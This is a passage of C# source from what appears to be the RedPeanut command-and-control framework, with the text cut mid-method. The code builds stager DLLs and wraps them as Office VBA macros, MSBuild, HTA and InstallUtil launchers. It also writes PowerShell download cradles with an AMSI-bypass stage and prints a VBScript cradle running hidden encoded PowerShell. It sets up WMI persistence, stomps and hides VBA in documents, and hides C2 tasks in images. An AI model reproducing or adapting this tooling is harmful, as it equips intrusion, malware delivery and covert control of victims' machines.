/// <summary>
/// Console entry point: prints the banner, creates the C2 server for
/// <paramref name="serverkey"/>, checks the configured listeners and then
/// drives the menu stack forever.
/// </summary>
/// <param name="serverkey">Key passed to <c>CreateC2Server</c> and to every
/// <c>RedPeanutManager</c> pushed on the menu stack.</param>
/// <remarks>
/// When <c>GetDefaultProfile()</c> returns 0 the method prints an error and
/// returns; otherwise it never returns on its own (the loop has no exit).
/// </remarks>
static void Execute(string serverkey)
{
    PrintBanner();

    c2m = new C2Manager();
    c2m.CreateC2Server(serverkey);
    CheckConfiguredListeners(c2m.GetC2Server());

    int defaultProfileId = c2m.GetC2Server().GetDefaultProfile();
    if (defaultProfileId == 0)
    {
        Console.WriteLine("[x] Error loading profiles");
        return;
    }

    // Menu loop: whenever the stack runs empty, fall back to the root menu.
    while (true)
    {
        if (Menustack.Count == 0)
        {
            Menustack.Push(new RedPeanutManager(serverkey));
        }

        Menustack.Peek().Execute();
    }
}
/// <summary>
/// Builds the stager DLL and the shooter assembly from the workspace
/// templates, wraps the shooter with <c>VBAGenerator</c> and writes the
/// generated script text into the EvilClippy workspace folder as
/// <c>filename</c>.
/// </summary>
/// <remarks>
/// Returns without output when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Every exception is reported on the console and swallowed.
/// Visible side effects: a randomly named <c>.dll</c> is generated and
/// registered as a web resource, and one file is written under the workspace.
/// </remarks>
private void Run()
{
    // Kept from the original; nothing in this method reads it.
    List<string> unusedArgs = new List<string>();

    try
    {
        bool optionsIncomplete = string.IsNullOrEmpty(filename)
            || string.IsNullOrEmpty(lhost)
            || lport < 1
            || profile < 1;
        if (optionsIncomplete)
        {
            return;
        }

        // Parse .cs source and replace variables
        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            return;
        }

        // Build the agent stager from its template.
        ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
        string stagerSource = Replacer.ReplaceAgentProfile(
            File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
            RedPeanut.Program.GetServerKey(),
            35,
            listener);
        string stagerDllName = RandomAString(10, new Random()) + ".dll";
        Builder.GenerateDll(stagerSource, stagerDllName, 35);

        // Register the generated DLL with the web server.
        Program.GetC2Manager().GetC2Server().RegisterWebResource(stagerDllName, new WebResourceInstance(null, stagerDllName));

        // Normalise the content URI: no leading slash, exactly one trailing slash.
        string contentUri = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
        if (!contentUri.EndsWith("/"))
        {
            contentUri = contentUri + "/";
        }
        string resourcePath = contentUri + stagerDllName;

        // Build the shooter assembly that points at the registered resource.
        string shooterSource = Replacer.ReplaceAgentShooter(
            File.ReadAllText(Path.Combine(templateDir, SHOOTER_TEMPLATE)),
            resourcePath,
            listener);
        string shooterBase64 = Builder.GenerateDllBase64(shooterSource, RandomAString(10, new Random()) + ".dll", 35);
        VBAGenerator generator = new VBAGenerator(shooterBase64, null);

        // Write the generated script next to the other EvilClippy inputs.
        string outputDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
        File.WriteAllText(Path.Combine(outputDir, filename), generator.GetScriptText());
        Console.WriteLine("[*] {0} Created", Path.Combine(outputDir, filename));
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
/// <summary>
/// Builds the stager assembly from its template, GZip-compresses and
/// Base64-encodes it, and hands it to <c>MSBuildGenerator</c> together with
/// the <c>#{taskname}</c> substitution. The result is either registered as a
/// web resource (<c>hosted</c>) or written to the temp directory.
/// </summary>
/// <remarks>
/// Returns without output when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Every exception is reported on the console and swallowed.
/// </remarks>
private void Run()
{
    // Kept from the original; nothing in this method reads it.
    List<string> unusedArgs = new List<string>();

    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost))
        {
            return;
        }
        if (lport < 1 || profile < 1)
        {
            return;
        }

        // Parse .cs source and replace variables
        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            return;
        }

        ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
        string stagerSource = Replacer.ReplaceAgentProfile(
            File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
            RedPeanut.Program.GetServerKey(),
            40,
            listener);

        // Compile, then re-encode as Base64 of the GZip-compressed bytes.
        byte[] assemblyBytes = Convert.FromBase64String(Builder.GenerateDllBase64(stagerSource, filename));
        string compressedBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblyBytes));

        Dictionary<string, string> substitutions = new Dictionary<string, string>
        {
            { "#{taskname}", taskname }
        };
        MSBuildGenerator generator = new MSBuildGenerator(compressedBase64, substitutions);

        if (!hosted)
        {
            // Write the generated script to the temp directory.
            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), generator.GetScriptText());
            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
        }
        else
        {
            // Add the resource to the web server storage.
            Program.GetC2Manager().GetC2Server().RegisterWebResource(filename, new WebResourceInstance(generator, filename));
            Console.WriteLine("[*] Resource added to webserver resources");
            return;
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
/// <summary>
/// Serializes <paramref name="task"/> to indented JSON, encrypts it through
/// <c>EncryptAesMessage</c> with the agent's AES object and Base64-encodes the
/// result. Depending on the HTTP profile the return value is either that
/// Base64 text or an HTML page referencing a generated PNG that carries it.
/// </summary>
/// <param name="agent">Agent whose <c>AesManager</c> is used for encryption.</param>
/// <param name="task">Task message to serialize.</param>
/// <returns>
/// The HTML source when <c>profile.HtmlCovered</c> is set, otherwise the
/// Base64 ciphertext. An empty string when the HTML template contains no
/// "targetclass" marker.
/// </returns>
/// <remarks>
/// In the HTML branch every call writes a new randomly named <c>.png</c> into
/// the assembly output folder and registers it as a web resource; nothing in
/// this block removes either afterwards.
/// </remarks>
private string CreateTaskMgs(IAgentInstance agent, TaskMsg task)
{
    AesManaged aes = agent.AesManager;
    HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid);
    string mesg;
    if (profile.HtmlCovered)
    {
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER);
        string htmlsource = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE));
        // Number of "targetclass" occurrences in the template (pieces minus one).
        int elements = htmlsource.Split("targetclass").Length - 1;
        if (elements <= 0)
        {
            return("");
        }
        string[] images = ListImages();
        Random random = new Random();
        // Random.Next excludes its upper bound: for elements > 1 the index is in
        // [1, elements - 1]; for elements == 1 it is always 1.
        int payloadindex = random.Next(1, elements);
        // Create the image with the task embedded.
        string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
        taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes));
        string outputfilename = RandomAString(10, random) + ".png";
        string outfullpath = Path.Combine(outputfolderrpath, outputfilename);
        // NOTE(review): assumes ListImages() returns at least payloadindex entries;
        // no length check is made here — confirm against ListImages.
        string imagepath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]);
        // taskmsg is Base64 text at this point, so the bytes handed over are its encoded form.
        ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath);
        // Add the image to the web server resources.
        C2Manager c2manager = Program.GetC2Manager();
        c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename));
        // Create the HTML page; the byte length of the Base64 text is passed along.
        htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images);
        return(htmlsource);
    }
    else
    {
        // Plain branch: the response is the Base64 ciphertext itself.
        string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
        mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes));
        return(mesg);
    }
}
/// <summary>
/// Dispatches one main-menu command.
/// </summary>
/// <param name="input">Command typed by the operator. Null or empty input is
/// ignored; a command that is not a key of <c>mainmenu</c> prints the option
/// list with a "Command not found" header.</param>
/// <remarks>
/// "launcher" and "c2" push the corresponding manager (created on first use)
/// on the menu stack and set <c>exit</c>; "list" prints the options; "exit"
/// sets <c>exit</c>, prints a farewell and calls <c>ShutDown</c>.
/// </remarks>
static void MainMenu(string input)
{
    if (string.IsNullOrEmpty(input))
    {
        return;
    }

    if (!mainmenu.ContainsKey(input))
    {
        PrintOptionsNoStd("Command not found", mainmenu);
        return;
    }

    if (input == "launcher")
    {
        if (launcherm == null)
        {
            launcherm = new LauncherManager(null);
        }
        Program.GetMenuStack().Push(launcherm);
        exit = true;
    }
    else if (input == "c2")
    {
        if (c2m == null)
        {
            c2m = new C2Manager();
        }
        Program.GetMenuStack().Push(c2m);
        exit = true;
    }
    else if (input == "list")
    {
        PrintOptions("Modules availlable", mainmenu);
    }
    else if (input == "exit")
    {
        exit = true;
        Console.WriteLine("See you soon");
        ShutDown();
    }
    // Any other key present in mainmenu is accepted but does nothing.
}
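/// <summary>
/// Applies the selected <c>MSOfficeManipulator</c> operations to
/// <c>targetfile</c> in the EvilClippy workspace folder, commits the result
/// and, when <c>hosted</c> is set, registers the output file as a web
/// resource.
/// </summary>
/// <remarks>
/// Does nothing when <c>targetfile</c> is empty. Returns after a console
/// message when the target file, or a requested VBA source file, does not
/// exist. Failures inside the manipulation step are reported on the console
/// instead of being dropped silently.
/// </remarks>
private void Run()
{
    try
    {
        if (string.IsNullOrEmpty(targetfile))
        {
            return;
        }

        string filetowork = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, targetfile);
        if (!File.Exists(filetowork))
        {
            Console.WriteLine("[x] File not found {0}", filetowork);
            return;
        }

        // Resolve the VBA source only when one was requested: Path.Combine throws
        // on a null component, which previously aborted runs that had no source file.
        string vbasrc = null;
        if (!string.IsNullOrEmpty(sourcefile))
        {
            vbasrc = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, sourcefile);
            if (!File.Exists(vbasrc))
            {
                Console.WriteLine("[x] VBA source not found {0}", vbasrc);
                // Stop here rather than passing a missing file to StompVBAModules.
                return;
            }
        }

        try
        {
            MSOfficeManipulator mSOfficeManipulator = new MSOfficeManipulator(filetowork, names.Split(' '));

            if (!string.IsNullOrEmpty(targetversion))
            {
                mSOfficeManipulator.SetTargetOfficeVersion(targetversion);
            }
            if (unviewableVBA)
            {
                mSOfficeManipulator.UnviewableVBA();
            }
            if (viewableVBA)
            {
                mSOfficeManipulator.ViewableVBA();
            }
            if (guihide)
            {
                mSOfficeManipulator.HideInGUI();
            }
            if (guiunhide)
            {
                mSOfficeManipulator.UnhideInGUI();
            }
            if (vbasrc != null)
            {
                mSOfficeManipulator.StompVBAModules(vbasrc);
            }
            if (randomnames)
            {
                mSOfficeManipulator.SetRandomNames();
            }
            if (resetmodulenames)
            {
                mSOfficeManipulator.ResetModuleNames();
            }
            if (delmetadata)
            {
                mSOfficeManipulator.DeleteMetadata();
            }

            string outputfile = Path.GetFileName(mSOfficeManipulator.Commit());
            Console.WriteLine("[*] Output file {0}", outputfile);

            // Add the resource to the web server storage if required.
            if (hosted)
            {
                C2Manager c2manager = Program.GetC2Manager();
                c2manager.GetC2Server().RegisterWebResource(outputfile, new WebResourceInstance(null, outputfile));
                Console.WriteLine("[*] File added to webserver resources /office/{0}", outputfile);
            }
        }
        catch (Exception inner)
        {
            // Previously swallowed without any message.
            Console.WriteLine("[x] Error processing file {0}", inner.Message);
            return;
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}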
/// <summary>
/// Builds a stager for the listener the current agent is connected to,
/// registers two PowerShell web resources for it, fills the PersWMI template
/// with the event name, the resource URL and the process name, compiles that
/// template and passes the result to <c>RunAssemblyBase64</c> for the agent.
/// </summary>
/// <remarks>
/// Does nothing when <c>processname</c> or <c>eventname</c> is empty. Every
/// exception, including a failed cast of <c>agent</c> to
/// <c>AgentInstanceHttp</c>, is reported on the console and swallowed.
/// Web resources registered here: <c>&lt;name&gt;.ps1</c> and
/// <c>s2_&lt;name&gt;.ps1</c>, where <c>&lt;name&gt;</c> is the lower-cased
/// output of <c>RandomAString(10, ...)</c>; nothing in this block unregisters them.
/// </remarks>
private void Run()
{
    try
    {
        // Not read anywhere in this method.
        List <string> args = new List <string>();
        if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
        {
            // Create and register the web resources.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            string filename = RandomAString(10, new Random()).ToLower();
            // Listener settings are taken from the agent itself (address, port, profile id).
            ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());
            string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");
            byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
            string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
            // #{bytelen} carries the uncompressed assembly length.
            Dictionary <string, string> argagent = new Dictionary <string, string>();
            argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
            // Normalise the content URI: no leading slash, exactly one trailing slash.
            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;
            uricontent = uricontent.TrimStart('/');
            if (!uricontent.EndsWith("/"))
            {
                uricontent += "/";
            }
            // #{uri} points at the second resource registered below.
            Dictionary <string, string> arg = new Dictionary <string, string> { { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() }, { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() }, { "#{uri}", uricontent + "s2_" + filename + ".ps1" } };
            PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
            PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
            // Add both resources to the web server storage.
            C2Manager c2manager = Program.GetC2Manager();
            c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
            c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
            Console.WriteLine("[*] Resource added to webserver resources");
            // The URL scheme follows the ssl flag.
            string proto = "";
            if (ssl)
            {
                proto = "https";
            }
            else
            {
                proto = "http";
            }
            string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");
            string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));
            perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);
            // Compile the filled template, GZip-compress and Base64-encode it, then
            // pass it on with the type name "PersWMI" and a single-space argument.
            RunAssemblyBase64(
                Convert.ToBase64String(
                    CompressGZipAssembly(
                        Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
                    )
                ),
                "PersWMI",
                new string[] { " " },
                agent);
            return;
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error generating task {0}", e.Message);
    }
}
/// <summary>
/// Builds an HTA launcher for the configured listener in the flavour named
/// by <c>lang</c> ("vbs" or "powershell") and either registers the generated
/// files as web resources (<c>hosted</c>) or writes them to the temp
/// directory.
/// </summary>
/// <remarks>
/// Returns without output when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Any other <c>lang</c> value prints "Language not supported".
/// Every exception is reported on the console and swallowed.
/// Files and resources produced: the "vbs" flavour always generates and
/// registers a randomly named <c>.dll</c>; the "powershell" flavour produces
/// <c>filename</c>, a randomly named <c>.ps1</c> and the same name prefixed
/// with <c>s2_</c>.
/// </remarks>
private void Run()
{
    // Not read anywhere in this method.
    List <string> args = new List <string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            if (lang == "vbs")
            {
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    // Build the agent stager from its template.
                    ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                    string outfilename = RandomAString(10, new Random()) + ".dll";
                    Builder.GenerateDll(source, outfilename, 35);
                    // Register the generated DLL with the web server (done whether or not hosted is set).
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));
                    // Normalise the content URI: no leading slash, exactly one trailing slash.
                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }
                    string resourcepath = uricontent + outfilename;
                    // Build the shooter assembly that points at the registered resource.
                    source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                    source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);
                    string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);
                    HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);
                    if (hosted)
                    {
                        // Add the resource to the web server storage.
                        c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                        Console.WriteLine("[*] Resource added to webserver resources");
                        // The scheme in this message is a literal "https"; no ssl flag is consulted here.
                        Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                        return;
                    }
                    else
                    {
                        // Write the file to the temp directory.
                        File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                    }
                }
            }
            else
            {
                if (lang == "powershell")
                {
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        // This branch calls RandomString, the "vbs" branch RandomAString.
                        string psfilename = RandomString(10, new Random()) + ".ps1";
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");
                        // Template substitutions shared by gen_s0 and gen_s1.
                        Dictionary <string, string> arg = new Dictionary <string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());
                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
                        uricontent = uricontent.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }
                        // #{uri} points at the "s2_" resource.
                        arg.Add("#{uri}", uricontent + "s2_" + psfilename);
                        byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
                        // #{bytelen} carries the uncompressed assembly length.
                        Dictionary <string, string> argagent = new Dictionary <string, string>();
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
                        // The HTA wraps the script text produced by gen_s0.
                        HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);
                        if (hosted)
                        {
                            // Add the three resources to the web server storage.
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                            c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            // The scheme in this message is a literal "https"; no ssl flag is consulted here.
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            return;
                        }
                        else
                        {
                            // Write the three files to the temp directory.
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                        }
                    }
                }
                else
                {
                    Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                    return;
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
/// <summary>
/// Builds the stager assembly from its template and produces two PowerShell
/// scripts from it (<c>filename</c> and <c>s2_</c> + <c>filename</c>). With
/// <c>hosted</c> set they are registered as web resources and an example
/// cradle is printed; otherwise both are written to the temp directory.
/// </summary>
/// <remarks>
/// Returns without output when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Every exception is reported on the console and swallowed.
/// </remarks>
private void Run()
{
    // Not read anywhere in this method.
    List <string> args = new List <string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse .cs source and replace variables
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
                // Template substitutions shared by gen_s0 and gen_s1.
                Dictionary <string, string> arg = new Dictionary <string, string>();
                arg.Add("#{lhost}", lhost);
                arg.Add("#{lport}", lport.ToString());
                // Normalise the content URI: no leading slash, exactly one trailing slash.
                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
                uricontent = uricontent.TrimStart('/');
                if (!uricontent.EndsWith("/"))
                {
                    uricontent += "/";
                }
                // #{uri} points at the "s2_" resource.
                arg.Add("#{uri}", uricontent + "s2_" + filename);
                byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
                // #{bytelen} carries the uncompressed assembly length.
                Dictionary <string, string> argagent = new Dictionary <string, string>();
                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
                if (hosted)
                {
                    // Add both resources to the web server storage.
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                    Console.WriteLine("[*] Resource added to webserver resources");
                    // The scheme in this message is a literal "https"; no ssl flag is consulted here.
                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                    // Print an example snippet; only the {0} placeholder (gen_s0's
                    // script text) varies, every other line is a fixed literal.
                    Console.WriteLine("[*]");
                    Console.WriteLine("[*] Cradle example");
                    Console.WriteLine("[*]");
                    Console.WriteLine("<script language = \"VBScript\">");
                    Console.WriteLine(" Function etaget()");
                    Console.WriteLine("");
                    Console.WriteLine(" Dim ahsten");
                    Console.WriteLine(" Set ahsten = CreateObject(\"Wscript.Shell\")");
                    Console.WriteLine(" ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                    Console.WriteLine(" End Function");
                    Console.WriteLine("");
                    Console.WriteLine(" etaget");
                    Console.WriteLine(" self.close");
                    Console.WriteLine("</script>");
                    Console.WriteLine("[*]");
                    return;
                }
                else
                {
                    // Write both files to the temp directory.
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
/// <summary>
/// Builds the stager assembly from its template, GZip-compresses and
/// Base64-encodes it, substitutes it for <c>#{assembly}</c> in the
/// InstallUtil template and compiles that to <c>filename</c>. The compiled
/// file is then registered as a web resource (<c>hosted</c>) or copied to
/// the temp directory.
/// </summary>
/// <remarks>
/// Returns without output when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Prints an error when the compiled file is missing from the
/// assembly output folder. Every exception is reported on the console and
/// swallowed.
/// </remarks>
private void Run()
{
    // Kept from the original; nothing in this method reads it.
    List<string> unusedArgs = new List<string>();

    try
    {
        bool optionsIncomplete = string.IsNullOrEmpty(filename)
            || string.IsNullOrEmpty(lhost)
            || lport < 1
            || profile < 1;
        if (optionsIncomplete)
        {
            return;
        }

        // Parse .cs source and replace variables
        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            return;
        }

        ListenerConfig listener = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
        string stagerSource = Replacer.ReplaceAgentProfile(
            File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE)),
            RedPeanut.Program.GetServerKey(),
            40,
            listener);

        // Compile under a "tmp_" name, then re-encode as Base64 of the GZip-compressed bytes.
        byte[] assemblyBytes = Convert.FromBase64String(Builder.GenerateDllBase64(stagerSource, "tmp_" + filename));
        string compressedBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblyBytes));

        string installUtilSource = File.ReadAllText(Path.Combine(templateDir, INSTALLUTIL_TEMPLATE));
        installUtilSource = installUtilSource.Replace("#{assembly}", compressedBase64);
        Builder.GenerateExe(installUtilSource, filename);

        bool built = File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename));
        if (!built)
        {
            Console.WriteLine("[x] Error creating IndtallUtil dll");
        }
        else if (hosted)
        {
            // Add the resource to the web server storage.
            Program.GetC2Manager().GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename));
            Console.WriteLine("[*] Resource added to webserver resources");
            return;
        }
        else
        {
            // Copy the compiled file to the temp directory.
            File.WriteAllBytes(
                Path.Combine(Path.GetTempPath(), filename),
                File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)));
